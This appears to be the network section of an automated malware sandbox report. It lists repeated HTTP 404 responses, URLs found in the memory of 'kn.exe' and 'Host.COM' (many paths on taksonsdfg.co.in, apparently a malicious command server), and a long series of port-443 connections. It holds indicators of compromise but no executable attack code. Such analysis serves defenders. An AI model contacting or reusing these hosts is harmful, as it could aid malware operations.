      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:44 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:45 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:46 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:47 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:48 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:49 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:51 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:52 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:53 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:54 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:55 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:56 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:57 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:58 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:00 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:01 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:02 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:03 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:04 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:05 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:07 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:08 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:09 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:10 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:11 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:12 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:13 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:14 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:16 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:17 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:18 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:19 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:20 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
      Source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
      Source: Host.COM, Host.COM, 00000009.00000002.3035851816.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800405801.0000000002892000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3054244908.000000007FA30000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3034224686.0000000002899000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1801015000.000000007F8EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
      Source: kn.exeString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
      Source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
      Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
      Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
      Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
      Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
      Source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
      Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
      Source: Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/
      Source: Host.COM, 00000009.00000003.1923031357.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/./
      Source: Host.COM, 00000009.00000002.3052727983.000000002501D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/25
      Source: Host.COM, 00000009.00000003.2455294317.000000000088D000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2564991839.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2621473142.000000000088D000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3052727983.0000000025000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx
      Source: Host.COM, 00000009.00000002.3032889978.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx&/
      Source: Host.COM, 00000009.00000003.1832111190.000000000087B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1865183641.00000000008A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx/;
      Source: Host.COM, 00000009.00000003.1832111190.000000000087B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1865183641.00000000008A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_ZnrgbbhcbyxB8
      Source: Host.COM, 00000009.00000003.2655006782.00000000008AB000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_ZnrgbbhcbyxN/c$
      Source: Host.COM, 00000009.00000003.1832111190.000000000087B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_ZnrgbbhcbyxV
      Source: Host.COM, 00000009.00000003.2455294317.00000000008A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_ZnrgbbhcbyxV/K$
      Source: Host.COM, 00000009.00000002.3032889978.00000000007FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyxo/
      Source: Host.COM, 00000009.00000003.2643538771.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2667836018.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2655006782.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyxv/
      Source: Host.COM, 00000009.00000003.1865183641.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx~
      Source: Host.COM, 00000009.00000003.2455294317.00000000008A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/6/
      Source: Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/H
      Source: Host.COM, 00000009.00000002.3032889978.00000000007FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/Z
      Source: Host.COM, 00000009.00000002.3032889978.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2643538771.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2667836018.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2621473142.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2655006782.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/f/
      Source: Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/n/C$
      Source: Host.COM, 00000009.00000003.1865183641.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2455294317.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1832111190.000000000087B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1935087068.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2621473142.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/x
      Source: Host.COM, 00000009.00000003.1923031357.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/~
      Source: Host.COM, 00000009.00000002.3032889978.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/34243456dfgd/255_Znrgbbhcbyx;
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
      Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
      Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
      Source: unknownNetwork traffic detected: HTTP traffic on port 50210 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
